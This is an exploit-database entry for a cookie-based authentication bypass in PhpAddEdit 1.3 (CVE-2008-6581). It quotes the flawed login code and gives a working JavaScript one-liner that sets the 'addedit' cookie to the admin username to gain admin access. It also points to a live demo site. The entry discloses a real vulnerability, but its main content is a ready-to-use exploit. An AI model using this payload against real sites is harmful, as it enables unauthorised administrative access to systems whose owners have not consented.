PhpAddEdit 1.3 - 'cookie' Authentication Bypass

Author: x0r
type: webapps
platform: php
port: 
date_added: 2008-12-10 
date_updated: 2017-01-06 
verified: 1 
codes: OSVDB-50674;CVE-2008-6581 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpaddedit-1.3.zip

-------------------------------------
   PhpAddEdit 1.3 Login By Pass
-------------------------------------

Found By: x0r ( Evolution Team )
Email: andry2000@hotmail.it
-------------------------------------

Bug In: Addedit-login.php

		if (!$login_error) {
			// --- Set admin cookie so favorite form field will show up when I use
the site...
			if ($_POST["rememberme"]) {
				$expire = mktime(0,0,0,date("m"),date("d")+120,date("Y"));
				setcookie("addedit", $_POST["adminuser"], $expire, "/", "", 0);
			} else {
				setcookie("addedit", $_POST["adminuser"]);
			}
			Header("Location:  ./");
		}
	}

Ci basta conoscere l'username dell'admin per bypassare il login :P ^ ^
-------------------------------------

Exploit:

javascript:document.cookie = "addedit=[adminuser]; path=/";

es:

javascript:document.cookie = "addedit=x0r; path=/";
--------------------------------------
Live Demo: http://www.phpaddedit.com/demo/
--------------------------------------
Greetz: Amore oggi +65 ti amo troppo.

# milw0rm.com [2008-12-11]